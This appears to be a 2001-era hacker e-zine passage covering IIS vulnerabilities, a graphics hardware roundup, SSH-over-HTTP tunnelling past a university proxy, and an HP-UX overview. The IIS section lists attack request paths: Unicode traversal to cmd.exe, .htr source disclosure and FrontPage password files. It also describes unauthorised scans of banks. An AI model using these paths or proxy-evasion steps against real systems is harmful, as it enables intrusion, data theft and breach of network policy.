First step would be to check for default directories, and/or the presence of
msadcs.dll. If the directory exists, then chances are the return code will be
403 (permission denied), if the directory does not exist, then the return code
will be 404 (not found).

Next step would be to try null.htw like so

http://www.server.com/null.htw

and see if there is a response, based on these results, you can recursively
go through a list of potential scripts that might be on the server, and use
one or more to read/execute files on the system (see end of text).

The sample directories can also be used to exploit the UNICODE bug mentioned
earlier.


Plan of defense
----------------

It isnt impossible to have a secure IIS server - it just takes a few simple
steps.

- Take the time to do a custom install of the option pack, and remove what you
wont need
- Remove all sample directories
- Remove all associations to default ISAPI objects (webhits.dll, ism.dll) from
the management console
- Apply the latest service pack
- Apply all the latest hot fixes (http://www.microsoft.com/technet/security)
- Monitor Microsoft alerts and security mailing lists for latest bugs
- Turn off verbose error output from the server, and have a customer error
page
- Install an IDS (snort has been ported to win32, http://www.snort.org)

Its also interesting to note that some Microsoft Hotfixes open up new security
holes, which in turn have to be addressed again. This is mentioned in the
following post to Bugtraq entitled ".htr bug still exist after applying MS
patches"
:

http://archives.neohapsis.com/archives/bugtraq/2001-01/0502.html


Who is vulnerable
------------------

In just regarding Australian based websites, I've done some quick scans and
found that over 70% of e-commerce web servers running IIS had security holes
that would allow full compromise of data. In another result, I rounded up
every bank in Australia running IIS and found that over 50% of these where
vulnerable, allowing reading of any file on the system. The e-commerce sites
that were found to have security holes include some very large names in terms
of Australian-based e-commerce operations.

A common problem was that "front line" servers would be relatively patched,
but backend servers were left wide open. Quite often these other servers are
handling a lot of the work, and for some reason are overlooked when it comes
to updates and patches. With the amount of servers out there that are
vulnerable to such easy-to-exploit holes, I can only be surprised that there
isn't alot more public news about intrusions or disclosures of information.


What to look for
-----------------

Try these on your favourite server.

/global.asa+.htr (or anyfile +.htr)
/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
/Sites/Samples/Knowledge/Push/ViewCode.asp
/Sites/Samples/Knowledge/Push/ViewCode.asp
/SiteServer/Publishing/viewcode.asp
/msadc/msadcs.dll
/samples/search/queryhit.htm
/adsamples/config/site.csc
/scripts/cpshost.dll
/scripts/counter.exe
/search/webhits.exe
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+echo
/null.htw
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/msadc/Samples/SELECTOR/showcode.asp
/_AuthChangeUrl?
/scripts/fpcount.exe
/scripts/cgimail.exe
/scripts/tools/newdsn.exe
/_vti_pvt/users.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/__vti_inf.html
/black.idc
/black.idq
/black.ida
/black.idw
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo
/global.asa%3F+.htr (or any other file)
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw

Also see rhea, my own security scanner for windows (currently in early stages
of development):

http://black.wiretapped.net/rhea

--
black-hand <black.wiretapped.net>

. ....
..:............................................
: :
: 006 Overview of Recent and Future Hardware :
: ...:. .
:.:.. by Maticles : :
:.:.;................;........................:.:
: ;. . .. . ..;. . :
; ;

Ok, I'll tell you something first, all the benchmarks in this section are NOT
done by me, for as I do not own a Geforce 3 cards, and I cannot see myself
owning one in the near future, so there.

The Geforce 3 (Formally NV20) is a Graphical Processing Unit, capable of 800
billion operations per second, 76 gigaflops, this thing is a beast. The
Geforce 3 is featuring with a minimum of 64MB SDRAM/SGRAM running at 230MHz
DDR (460MHz), this gives it 3.2ns access. Nice.

The Geforce 3 includes the standard nVidia T&L engine, and optimised support
for the Pentium 4. The Geforce 3 takes on a 0.15 micron process Taking
advantage of the DX8 SDK, the Geforce 3 looks simply stunning, using Per-pixel
reflection, this means that light sources can reflect off a pixel, and not
need another light source there, it looks fantastic, and seemingly life-like,
but thats what we said about Flight Simulator 5, which.. err.. isn't quite
life like. The Geforce 3 also has Environmental bumpmapping as well as DOT3
bumpmapping, and have both must be a good thing, as a variety of support with
erm.. bumps.


[Benchmark]

I got this 3dmark 2001 benchmark off hardocp.com, here are the results (GF3
vs. GF2 Ultra)

1024x768x32 on a Geforce 3 gets you 4859 3d marks.
1024x768x32 on a Geforce 2 Ultra gets you 3995 3d marks.

--

Radeon - The final interlude. - A quicker thing.

Here is some Radeon information for you;

Radeon was released around July/August of 2000, the Radeon has:
166MHz DDR ram (332MHz) (The better Radeon ViVo has 183MHz [366MHz]).
- HyperZ technology (Don't you love marketing?).
- Hardware Transform and Lighting engine.
- 2 Texture pipelines, but each can do 3 passes.
- Environmental bumpmapping.

--

This is all sounding very Geforce 2 territory, and its 2d quality EASILY
surpassed Geforce's 2d engine (without the 2d 'hack' of course - goto
google.com is you must know about the "2d hack for geforce") and its 3d is
NEARLY equal (some cases is equal) to the Geforce 2 GTS, but is still a touch
slower.

Environmental bumpmapping is a feature mostly seen on Matrox video cards, and
boy does it look GOOD - it rocks, but I find nVidia's DOT3 bump mapping to be
that slight better, although the nVidia shading rasterizer helps alot with the
shadows etc on the bumps.

--

AMD Palomino.

AMD's next generation of CPU is dawning on us lately, with information from
AMD being released at CeBIT, its going to be released on Quarter 3 of 2001.
Starting at 1533MHz, based on the Athlon core, its certaintly going to give
the Pentium 4 a run for its money, being cheaper too (priced around the same
as the current Athlon I predict) and not tied down to RAMBUS, Intel, look out.

Palomino also has Hardware Prefetching, Improved Branch-Prediction Unit, but
lacks SSE2, no longer pipeline, but it also doesn't require a new socket.

Maticles

. ....
..:............................................
: :
: 007 Tunnelling SSH via HTTP :
: ...:. .
:.:.. by Tengu : :
:.:.;................;........................:.:
: ;. . .. . ..;. . :
; ;

Introduction
============
This article is loosely based around an idea presented in the
Firewall Piercing mini-HOWTO[1]. After starting university and
sitting down at a Windows based terminal was presented with the
problem of not being able to ssh home. I tried some experiments to
determine what exactly was going on. It appears that the institution
had blocked all Internet access outside their own subnet. They have
allowed specific services such as HTTP/FTP via their own
authenticating and accounting local proxy server.

This article aims to provide a brief understanding of how to use HTTP
tunnelling using the httptunnel package and how it actually works. I
have tried to create references where appropriate for those who which
to continue their reading.

Overview
========
After a quick search in Google[2], I came up with an interesting
solution.

SSH Client -> Local httptunnel client (htc) -> Proxy server -> Remote
httptunnel server (hts) -> Remote SSH Server

Background
==========
HTTP/1.1. The concept is that if you are using HTTP/1.0, your browser
requests a webpage with 3 images, it makes 4 _seperate_ requests to
the HTTP server. For example, index.htm, image1.png, image2.png and
image3.png. The difference with HTTP/1.1, is that it is able to serve
and request multiple files in a single GET statement. If you want to
read more about this, have a look at the RFCs. {2068, 1945}

httptunnel
===========
httptunnel[3] is the software, which creates a ‘fake’ connection
through the proxy server. Generally, you would run the server
component on the box that you wish to connect to, but this is not
required (for further ideas, read ‘expanding’ section). The client
(htc) and server (hts) components are available in a *nix[3], and a
NT[4] implementation.

Instructions
============
There are 3 general things you need to do. Metaphorically speaking,
you need to a) Open the door at the other end, b) Dig the tunnel, c)
Open your door.

a) Start the tunnel server. We do this by running the server
component on a remote box that we know that the proxy server can
access. This should be just about anywhere, provided they don’t
filter content. This starts a server listening on port 8888, and
forwarding requests to localhost:22, ie your local ssh server.
hts -F localhost:22 8888

b) Starts the tunnel client. This creates a persistent connection
from your workstation, through the proxy server, to your remote
server. It does this by requesting a page from the proxy server of
the form, GET http://remote:8888/junk.html?. As far as the proxy
knows, this is a valid request. Your client never closes the
connection however, so because it’s a HTTP/1.1 GET request, the
connection stays open. Perfect for us, now we can put whatever we
want through this ‘tunnel’, and the httptunnel server at the
remote end, will pass it onto our ssh server.
htc -F 2000 –D 1 -P PROXY:8000 REMOTE:8888
or if your proxy server required you to login (like mine),
htc -F 2000 –D 1 -P PROXY:8080 -A USER:PASS REMOTE:8888

c) Start ssh client. Now we need to connect our client to the tunnel,
this is done by simply opening your favourite client (eg. PuTTY),
and connecting to localhost port 2000, or whatever you specified
for the –F option.

And what we have here, is a connection as described in the Overview
section. With this method, there is of course, more overhead than a
direct client, server connection. But the HTTP overhead is very
minimal and only experienced when actually setting up the tunnel in
part b, because after that there is no more actual HTTP requests.

Problems
========
o Microsoft Proxy Server has been known to cause 407 errors when
starting the client program.

o Your institution may implement content filtering, or have acls set
up to disallow http://remote:port/ requests. Some solutions to this
would be to run the server on port 80 on a box, which doesn’t have a
webserver.


Expanding
=========
As you may have gathered, you don’t have to run the server component
on the remote box that you wish to (ie –F localhost:22). You could of
course run hts on a public box and forward requests to another
server. For example, bob@work.com$ hts –F homebox:22 8888. Bob could
then connect from his institution, to his work tunnelling server.

Also, this whole article is not limited to SSH. Of course it could be
applied to (some) other protocols that work in the same way. For
instance, telnet, ftp, and irc with a little tweaking. But that is
beyond the scope of this document. Try your luck on google for more
ideas.

References
==========
[1] http://www.linux.com/howto/mini/Firewall-Piercing.html
[2] http://www.google.com/search?q=http+proxy+tunnel+ssh
[3] http://www.nocrew.org/software/httptunnel.html
[4] http://www.okchicken.com/~philip/httptunnel/

--
By Grant Holliday (tengu)
<grant@untz.cx>

. ....
..:..................................................
: :
: 008 HP-UX and the HP-9000/800 Series Unix server :
: ...:. .
:.:.. by Kayjay : :
:.:.;................;..............................:.:
: ;. . .. . ..;. . :
;

Hardware:
-What is a HP-9000?
-Models - (G,E,D,T,K,L,N,A,V,SuperDome)
-CPU's
-Busses
-Hardware Paths and Block Diagrams
-SCSI/Fibre Channel.
-Networking (10/100/Gig Eth.)
-The HP-UX Boot Process

Operating System:
-HP-UX
-Brief Introduction to LVM.
-Mapping your system with ioscan
-Software and Patch install.
-Administering Tasks made easy with SAM
-Security

Outro:
-References/URLs/Bibliography.
-Disclaimer.


Introduction:
HP-UX is a SVR4 Unix Operating System written, Supported and Maintained by
Hewlett Packard. Used in many small to large business's HP-UX is one of the
Top three players in the Commercial UNIX world. The others being IBMs AIX on
RS/6000 and Suns Solaris/SunOS on the Sparc.

What I will cover in this paper/talk is an introduction to HP-UX and the
HP-9000 Architecture. Some experience with Unix is recommended to fully grasp
the concepts in this paper.

-kayjay

Models

The main HP-9000 systems in use around Australia and the world at the moment are.
- The G and E Series systems, also known as the Nova Series, which are very
old, yet, still supported. (For Now)
= The T Series, Designed at powering through multithreaded applications.
- The D series, A Small, Low end RISC Unix system aimed at small business.
- The K Series, HP's very popular scalable Midrange server.
- The L Series, A Fast, Affordable, Robust Unix server, Aimed at the midrange
market, features SMP and large memory capacity.
- The L Series is one of HP's newer servers, which looks to take off what the
K Series started.
- The N Series, An extremely fast, scalable and expandable Unix server, with
looks similar to the L Series, its known as the L's 'Big Brother'.
- The A Series, A small, extremely fast HP-9000 aimed at the ISP market.
- The V Series, An extremely large, SMP system, designed for large databases
and large CPU loads.
- The Superdome. HP's new Very High End Unix server, Not much on these as not
many people would have even seen them yet.

The Current models that HP are rolling out as new installs are the L , N, A
and V series, along with the Superdome to those who can afford them.


CPU/Processors
HP-9000 CPU's are RISC processors, RISC being Reduced Instruction Set
Computing.

In short, RISC tries to do all the simple repetitive or often used instructions
in a hardwired processor in one CPU cycle. HP-9000s use what is called PA-RISC,
or Precision Archetecure RISC. PA-RISC is HPs additions to the RISC
architecture, adding performance and providing a stable framework and building
block to develop upon. PA-RISC has been designed to be fast, cost effective
and scalable.

PA-RISC CPU History.


PA-RISC Level Clock Speed HP-9000 Systems used in:
------------- ------------ ------------------------
PA 1.0 8-32Mhz 840/50/55/60/65
PA 1.0 (870) 50Mhz 870
PA 1.0 (890) 60Mhz 890
PA 1.1a (800) 32- 64Mhz F to I Series
PA 1.1b (T500) 90Mhz T500
PA 1.1c (800) 48-96Mhz E-Series
PA 1.1d (7200) 100-120Mhz K Series Not including 5xx, Some D-Series Systems
PA 1.1e (7300) 132-160Mhz D220/D230/D320/D330

PA 2.0 (8000) 160/180Mhz Some D and K Series only
PA 2.2 (8200) 200Mhz K370/K570
PA 2.x (8000) 180Mhz T600
PA 2.x (8200) 200Mhz V2200


The Current CPUs seen in the newer model machines are:
550Mhz - PA-8600
400/440Mhz - PA-8600
360Mhz- PA-8500


-Busses
Each part of the HP-9000 are conncected via system busses, just like on any
normal computer system.

Within the HP-9000 there are a few main types of bus. The following 3 Busses
are 3 popular busses for connecting Peripherals/Adapters to the HP-9000.
Each type of bus outlined below is linked to the system board via Bus Adapters
or Bus Converters.

HP-PB (HP Precision Bus)
HP-PB is an older type of system bus, still used and supported today, although
mainly on the older machines of which it comes standard. (E, K and T series
machines use it the most frequently.) HP-PB bus is generally

  
used for linking
external interfaces to the system such as SCSI cards,Tape Drives, Optical
Disks, Printers, Terminal Controllers, MUXes and Disks. The HP-PB interface is
easily recognised as alot of systems use large HP-PB I/O Expansion Cages to
allow maximum device connectivity to the systems. These cages are connected to
the system by large, thick ribbon type cables, generally grey in colour.
Unfortunately the HP-PB Bus is rather old and slow, allowing system performance
bottle necks to occur.


HSC (High Speed Connecct)
The HSC Bus is a high speed system bus, used for connecting SCSI interfaces,
Network interfaces and other I/O to the system much like HP-PB. HSC is
generally prefered to HP-PB on the older systems due to its much faster data
transfer rates. The HSC bus is generally found more often on D-Series machines
(where it also is known as GSC), K-Series and the T-Series machines.

PCI -
The PCI bus has just started making rounds on HP-9000 systems with the
introduction of the N and L Series machines. Although slightly different to
the PCI Bus on x86 based systems, the PCI bus is the current Bus of choice for
the HP-9000 Architecture. The PCI bus allows you to add SCSI Cards, Lan cards,
Fibre Channel cards, MUX Cards ect to the system and have fast Data transfer
rates.


-Hardware Paths and Block Diagrams.
HP-9000 Systems have what are called Hardware Paths.

The Hardware paths are a way of mapping out the hardware on a system to
identify where a specific device(s) on the system resides, and if it is
visible from the operating system. A Hardware path is generally a string of
slash and decimal point seperated decimal characters which allow you to follow
the hardware's path from the systemboard over the bus converters that connect
it to the systemboard, through the interface card (eg, SCSI Cards) to the
device.

Hardware paths are an important feature of HP-UX and HP-9000 Systems, and they
can be listed from the operating system with the ioscan command, which will be
covered later in the article. One thing to note is that Hardware paths on
every system are different, because each HP-9000 Model is different.

Most HP-9000 Systems have on the rear of the systems or any place where devices can be connected to the machine, a hardware path diagram
showing which slot or plug has which hardware path.

See the example block diagram on the Powerpoint Diagram of this paper at URL
www.wiretapped.net/~kj/hp-9k-talk.ppt This powerpoint Document is the document
I used at the 2600 Australia Seminar Series for my talk 'HP-UX/HP-9000
Overview'. As you can see the Hardware path --> 10/12/5 is referenced to the
'SE SCSI 2 ' (off the CORE I/O Card) device on the block diagram.



-SCSI/Fibre Channel
HP-9000 Systems two main interfaces to Peripheral Devices are SCSI (Small
Computer System Interface) which uses copper cabling and a variety of
different connectors and plugs to interface with mainly storage based devices
such as tape drives, disk drives and various librarys HP-9000 Systems support
SCSI 1, 2 and 3 and the LVD (Low Voltage Differential), HVD (High Voltage
Differential) and SE (Single Ended) Signalling methods.

And Fibre Channel, A High Speed peripheral interface which links systems to
devices via fibre optic cabling with high transfer speeds. With the future of
storage heading toward SAN's (Storage Area Networks), Fibre Channel will become
more and more popular, but as it is still an expensive medium, SCSI is still
the most Frequently used peripheral interface.

-Networking
The HP-9000 system supports various types of Network interfaces from Ethernet
(10/100mb), Token Ring to Gigabit Ethernet for ultra high speed network access.
The operating system itself supports a multitude of protocols such as TCP/IP,
SNA(IBM), SNMP. Without HP-9000/HP-UX's great networking support and ability
to intergrate into almost any kind of networked environment, it definately
would have just dissapeared into the dark.



-The HP-UX Boot Process.
(This does not include the V-Class System)

1) Power ON

2) POST (Power On Self Test)
-Hardware is tested upon power on. Depending on the Series of the system, the
seftest output to the console will differ. L-Series Scroll information about
what specific parts of the system are being tested and what the hardware
specific return codes were of each test upon completion, whereas systems like
the K-Series or D-Series just output a series of Hexadecimal codes to the LCD
Panel and to the bottom corner of the console, which can be referenced to a
chart to see which parts of the system are being tested, ie CPU(s),I/O, etc

3)BCH (Boot Console Handler)
The Boot console Handler is almost what you could call an advanced BIOS. It
allows you to configure Boot Paths for the system, ie, where is the operating
system located. And also allows us to do basic mapping of various peripherals
such as SCSI buses attached to the system ect. There are many many more
features availiable to you in the BCH, and each revision for each model system
is slightly different, so its probably would be worth doing some investigating
of it a bit yourself if you have the chance. The BCH resides in whats called
PDC (Processor Dependant Code), code that is (generally) stored on the systems
mainboard. In most situations the BCH is on a 10 Second delay, so if it is not
interuppted it will boot the operating system specified by the Primary Boot
path.

If you Interupt the Boot Process it is a tiny bit different, as you will be
placed at the BCH Main Menu. To move on with the boot process you must tell
BCH where to boot from, in most default installs we'll boot from the Primary
boot path by typing Main Menu> BO Pri

This will read some information from the LIF area of the bootable medium
specifed and we'll then be prompted with the following Interact with IPL (Y,
N, or Cancel)?>

4)IPL/ISL
The IPL (Initial Program Loader) or ISL (Initial System Loader) is the next
stage of the boot process after BCH. What the IPL/ISL allows you to do is
pass some paramiters to the kernel before its loaded into memory. To pass
these peramiters to the kernel you must select 'Y' to interact with the
IPL/ISL and then from the prompt type in the valid parameters you wish ie,
ISL>hpux -is <-- Boot to init level S or single user mode IPL>hpux <-- boot
default HP-UX

If you choose not to interact with the IPL/ISL HP-UX will boot with the
pre-set peramiters (generally just 'hpux' unless the administrator has
changed it with the mkboot command)

5) Load the Kernel into memory and execute Init scripts.
The Kernel at this stage is taken from the disk and loaded into memory if any
peramiters were passed to it from the IPL/ISL stage, these will be passed
before the laoding of the kernel into memory, once this is complete, the init
process will be spawned, the init scripts will be exectued, filesystems will
be mounted, and other processes will be started as per the system
configuration.

After this is complete you will then be prompted to Login, as per the usual
UNIX login: prompt.


Example:
Below is an example of an L-Series Boot Process starting from the BCH Screen,
POST has been left out intentionally. In this siutuation the Boot Seqence has
been interupted and then manually booted from the primary boot path.

************ EARLY BOOT VFP *************
End of early boot detected
*****************************************

Firmware Version 40.48

Duplex Console IO Dependent Code (IODC) revision 1

------------------------------------------------------------------------------
(c) Copyright 1995-2000, Hewlett-Packard Company, All rights reserved
------------------------------------------------------------------------------

Processor Speed State CoProcessor State Cache Size
Number State Inst Data
--------- -------- --------------------- ----------------- ------------
0 440 MHz Active Functional 512 KB 1 MB
3 440 MHz Idle Functional 512 KB 1 MB

Central Bus Speed (in MHz) : 82
Available Memory : 1048576 KB
Good Memory Required : 13020 KB

Primary boot path: 0/0/1/1.2
Alternate boot path: 0/0/2/0.2
Console path: 0/0/4/0.0
Keyboard path: 0/0/4/0.0


Processor is booting from first available device.

To discontinue, press any key within 10 seconds.

Boot terminated.


---- Main Menu ---------------------------------------------------------------

Command Description
------- -----------
BOot [PRI|ALT|<path>] Boot from specified path
PAth [PRI|ALT] [<path>] Display or modify a path
SEArch [DIsplay|IPL] [<path>] Search for boot devices

COnfiguration menu Displays or sets boot values
INformation menu Displays hardware information
SERvice menu Displays service commands

DIsplay Redisplay the current menu
HElp [<menu>|<command>] Display help for menu or command
RESET Restart the system
----
Main Menu: Enter command or menu > bo pri
Interact with IPL (Y, N, or Cancel)?> n

Booting...
Boot IO Dependent Code (IODC) revision 1


HARD Booted.

ISL Revision A.00.38 OCT 26, 1994

ISL booting hpux

Boot
: disk(0/0/1/1.2.0.0.0.0.0;0)/stand/vmunix
7094272 + 884904 + 753528 start 0x244468


alloc_pdc_pages: Relocating PDC from 0xf0f0000000 to 0x3faab000.
gate64: sysvec_vaddr = 0xc0002000 for 1 pages
NOTICE: nfs3_link(): File system was registered at index 4.
NOTICE: autofs_link(): File system was registered at index 6.

System Console is on the Built-In Serial Interface
Logical volume 64, 0x3 configured as ROOT
Logical volume 64, 0x2 configured as SWAP
Logical volume 64, 0x2 configured as DUMP
Swap device table: (start & size given in 512-byte blocks)
entry 0 - major is 64, minor is 0x2; start = 0, size = 4194304
Starting the STREAMS daemons-phase 1
Checking root file system.
file system is clean - log replay is not required
Root check done.
Create STCP device files
Starting the STREAMS daemons-phase 2
B2352B/9245XB HP-UX (B.11.00) #1: Wed Nov 5 22:38:19 PST 1997

Memory Information:
physical page size = 4096 bytes, logical page size = 4096 bytes
Physical: 1048576 Kbytes, lockable: 745560 Kbytes, available: 866456 Kbytes

/sbin/ioinitrc:
insf: Installing special files for sdisk instance 3 address 0/4/0/0.5.0
insf: Installing special files for sdisk instance 4 address 0/4/0/0.6.0

/sbin/bcheckrc:
Checking for LVM volume groups and Activating (if any exist)
Volume group "/dev/vg00" has been successfully changed.
vxfs fsck: sanity check: root file system OK (mounted read/write)
Checking hfs file systems
/sbin/fsclean: /dev/vg00/lvol1 (mounted) ok
HFS file systems are OK, not running fsck
Checking vxfs file systems
/dev/vg00/lvol8 :
vxfs fsck: sanity check: /dev/vg00/lvol8 OK
/dev/vg00/lvol3 :
vxfs fsck: sanity check: root file system OK (mounted read/write)
/dev/vg00/lvol4 :
vxfs fsck: sanity check: /dev/vg00/lvol4 OK
/dev/vg00/lvol5 :
vxfs fsck: sanity check: /dev/vg00/lvol5 OK
/dev/vg00/lvol6 :
vxfs fsck: sanity check: /dev/vg00/lvol6 OK
/dev/vg00/lvol7 :
vxfs fsck: sanity check: /dev/vg00/lvol7 OK

(c)Copyright 1983-1997 Hewlett-Packard Co., All Rights Reserved.
(c)Copyright 1979, 1980, 1983, 1985-1993 The Regents of the Univ. of California
(c)Copyright 1980, 1984, 1986 Novell, Inc.
(c)Copyright 1986-1992 Sun Microsystems, Inc.
(c)Copyright 1985, 1986, 1988 Massachusetts Institute of Technology
(c)Copyright 1989-1993 The Open Software Foundation, Inc.
(c)Copyright 1986 Digital Equipment Corp.
(c)Copyright 1990 Motorola, Inc.
(c)Copyright 1990, 1991, 1992 Cornell University
(c)Copyright 1989-1991 The University of Maryland
(c)Copyright 1988 Carnegie Mellon University
(c)Copyright 1991-1997 Mentat, Inc.
(c)Copyright 1996 Morning Star Technologies, Inc.
(c)Copyright 1996 Progressive Systems, Inc.
(c)Copyright 1997 Isogon Corporation


RESTRICTED RIGHTS LEGEND
Use, duplication, or disclosure by the U.S. Government is subject to
restrictions as set forth in sub-paragraph (c)(1)(ii) of the Rights in
Technical Data and Computer Software clause in DFARS 252.227-7013.


Hewlett-Packard Company
3000 Hanover Street
Palo Alto, CA 94304 U.S.A.

Rights for non-DOD U.S. Government Departments and Agencies are as set
forth in FAR 52.227-19(c)(1,2).

/sbin/auto_parms: DHCP access is disabled (see /etc/auto_parms.log)

HP-UX Start-up in progress
__________________________

<The INIT Scripts will now be executed and the system will become ready.



Operating System:
-HP-UX
Resources around on the web state that HP-UX v1.0 was release in 1986 (See
Reference section), the Current release is HP-UX 11i In short, HP-UX is a
robust SVR4 Unix operating system, tuned to run on PA-RISC hardware.

-Disk/Storage and A Brief Introduction to LVM.
Early Versions of HP-UX used a 'whole disk' method of using disk space, ie,
get a disk, partition it/create a filesystem on it,and then mount it. HP-UX
Currently uses whats called LVM (Logical Volume Manager) to manage disk space.
Those who have moved onto Linux Kernel 2.4 would have noticed the addition of
LVM support to the linux kernel and might already know about it.

The way that LVM works is that for a disk to be managed via LVM is must be
created as a Physical Volume (PV), when a disk is defined as a physical
volume, it has all the structures created on it to be managed by LVM.
Physical Volumes are then placed in what are called Volume groups. Volume
Groups are A collection of Physical Volumes which can then be subdivided into
Logical Volumes, where they would have their filesystems created, and then
mounted for use.

The Diagram Below Shows How a basic LVM Situation would look like.

PV-----PV <-- 2x Physical Volumes of 2Gig size (/dev/dsk/c1t2d0 , /dev/dsk/c1t3d0)
|
------
|VG01| <-- Reside in Volume Group VG01, which now contains 4Gig of allocatable space. (/dev/vg01)
--------
| | |
lv1 lv2 lv3 <-- 3 1 Gig Logical Volumes can be created, with 1 gig of space free to make other Logical Volumes (/dev/vg01/lvol1, /dev/vg01/lvol2, ect)


Why LVM?
LVM in cobination with Online-JFS (A extra part of the vxfs journaled file
system for HP-UX by veritas) can allow online extension of filesystems with
no downtime. You just add more Physical volumes to the volume group, extend
the required logical volume and the filesystem will cater for the changes.
LVM also allows you to make use of smaller drives by combining them into larger usable space.
Disadvantages of LVM?

In some situations LVM can be a disadvantage, for example if you have 3
different Disks, which you wish to add to a volume group, and they are all
different types and sizes, this can cause serious performance issues, and HP's
reccomendations are against mixing different speed/vendor disks in the same
volume group.

For a more Indepth overview of HP-UX LVM, see my Paper HP-UX LVM Overview.



-Mapping your System with ioscan
The ioscan command will scan the HP-9000 system reporting information on the
hardware such as where its located via Hardware Paths, Which devices files
are related to it, what drivers are being used for it (if its claimed) and a
brief description.

Below is an example of the ioscan -fn command
the -f for full listing of information and -n for listing of device file
information. As you can see you can obtain alot of information from this
command on how the system is comprised, if there are hardware issues, and
which device files are associated with which device.




root@hpux$ ioscan -fn

Class I H/W Path Driver S/W State H/W Type Description
========================================================================
bc 0 root CLAIMED BUS_NEXUS
bc 1 8 ccio CLAIMED BUS_NEXUS I/O Adapter
bc 2 10 ccio CLAIMED BUS_NEXUS I/O Adapter
ext_bus 0 10/0 c720 CLAIMED INTERFACE GSC built-in Fast/Wide SCSI Interface
target 0 10/0.0 tgt CLAIMED DEVICE
tape 2 10/0.0.0 stape CLAIMED DEVICE QUANTUM DLT7000
/dev/rmt/2m /dev/rmt/c0t0d0BEST
/dev/rmt/2mb /dev/rmt/c0t0d0BESTb
/dev/rmt/2mn /dev/rmt/c0t0d0BESTn
/dev/rmt/2mnb /dev/rmt/c0t0d0BESTnb
target 1 10/0.4 tgt CLAIMED DEVICE
disk 0 10/0.4.0 sdisk CLAIMED DEVICE SEAGATE ST34573WC
/dev/dsk/c0t4d0 /dev/rdsk/c0t4d0
target 2 10/0.5 tgt CLAIMED DEVICE
disk 1 10/0.5.0 sdisk CLAIMED DEVICE SEAGATE ST34573WC
/dev/dsk/c0t5d0 /dev/rdsk/c0t5d0
target 3 10/0.6 tgt CLAIMED DEVICE
disk 2 10/0.6.0 sdisk CLAIMED DEVICE Quantum XP34361WD
/dev/dsk/c0t6d0 /dev/rdsk/c0t6d0
target 6 10/0.7 tgt CLAIMED DEVICE
ctl 0 10/0.7.0 sctl CLAIMED DEVICE Initiator
/dev/rscsi/c0t7d0
bc 3 10/4 bc CLAIMED BUS_NEXUS Bus Converter
tty 0 10/4/0 mux2 CLAIMED INTERFACE MUX
/dev/diag/mux0 /dev/mux0
/dev/diag/tty0p0 /dev/tty0p0
/dev/diag/tty0p1 /dev/tty0p1
/dev/diag/tty0p7 /dev/tty0p7
ext_bus 1 10/4/4 scsi3 CLAIMED INTERFACE HP 28696A - Wide SCSI ID=7
target 4 10/4/4.0 target CLAIMED DEVICE
disk 3 10/4/4.0.0 disc3 CLAIMED DEVICE DGC C2300WDR5
/dev/dsk/c1t0d0 /dev/rdsk/c1t0d0
/dev/floppy/c1t0d0 /dev/rfloppy/c1t0d0
disk 4 10/4/4.0.1 disc3 CLAIMED DEVICE DGC C2300WDR5
/dev/dsk/c1t0d1 /dev/rdsk/c1t0d1
/dev/floppy/c1t0d1 /dev/rfloppy/c1t0d1
disk 5 10/4/4.0.2 disc3 CLAIMED DEVICE DGC C2300WDR5
/dev/dsk/c1t0d2 /dev/rdsk/c1t0d2
/dev/floppy/c1t0d2 /dev/rfloppy/c1t0d2
disk 15 10/4/4.0.3 disc3 CLAIMED DEVICE DGC C2300WDR5
/dev/dsk/c1t0d3 /dev/rdsk/c1t0d3
/dev/floppy/c1t0d3 /dev/rfloppy/c1t0d3
lan 0 10/4/8 btlan1 CLAIMED INTERFACE HP HP-PB 100 Base TX card
/dev/diag/lan0 /dev/ether0 /dev/lan0
ba 0 10/12 bus_adapter CLAIMED BUS_NEXUS Core I/O Adapter
ext_bus 3 10/12/0 CentIf CLAIMED INTERFACE Built-in Parallel Interface
/dev/c3t0d0_lp
ext_bus 2 10/12/5 c720 CLAIMED INTERFACE Built-in SCSI
target 7 10/12/5.0 tgt CLAIMED DEVICE
tape 0 10/12/5.0.0 stape CLAIMED DEVICE HP C1537A
/dev/rmt/0m /dev/rmt/c2t0d0BESTn
/dev/rmt/0mb /dev/rmt/c2t0d0BESTnb
/dev/rmt/0mn /dev/rmt/c2t0d0DDS
/dev/rmt/0mnb /dev/rmt/c2t0d0DDSb
/dev/rmt/c2t0d0BEST /dev/rmt/c2t0d0DDSn
/dev/rmt/c2t0d0BESTb /dev/rmt/c2t0d0DDSnb
target 9 10/12/5.2 tgt CLAIMED DEVICE
disk 6 10/12/5.2.0 sdisk CLAIMED DEVICE TOSHIBA CD-ROM XM-5701TA
/dev/dsk/c2t2d0 /dev/rdsk/c2t2d0
target 12 10/12/5.7 tgt CLAIMED DEVICE
ctl 1 10/12/5.7.0 sctl CLAIMED DEVICE Initiator
/dev/rscsi/c2t7d0
lan 1 10/12/6 lan2 CLAIMED INTERFACE Built-in LAN
/dev/diag/lan1 /dev/ether1
ps2 0 10/12/7 ps2 CLAIMED INTERFACE Built-in Keyboard/Mouse
/dev/ps2_0 /dev/ps2kbd
/dev/ps2_1 /dev/ps2mouse
bc 4 10/16 bc CLAIMED BUS_NEXUS Bus Converter
ext_bus 4 10/16/4 scsi3 CLAIMED INTERFACE HP 28696A - Wide SCSI ID=7
target 11 10/16/4.1 target CLAIMED DEVICE
disk 16 10/16/4.1.0 disc3 CLAIMED DEVICE DGC C2300WDR5
/dev/dsk/c4t1d0 /dev/rdsk/c4t1d0
/dev/floppy/c4t1d0 /dev/rfloppy/c4t1d0
disk 17 10/16/4.1.1 disc3 CLAIMED DEVICE DGC C2300WDR5
/dev/dsk/c4t1d1 /dev/rdsk/c4t1d1
/dev/floppy/c4t1d1 /dev/rfloppy/c4t1d1
disk 18 10/16/4.1.2 disc3 CLAIMED DEVICE DGC C2300WDR5
/dev/dsk/c4t1d2 /dev/rdsk/c4t1d2
/dev/floppy/c4t1d2 /dev/rfloppy/c4t1d2
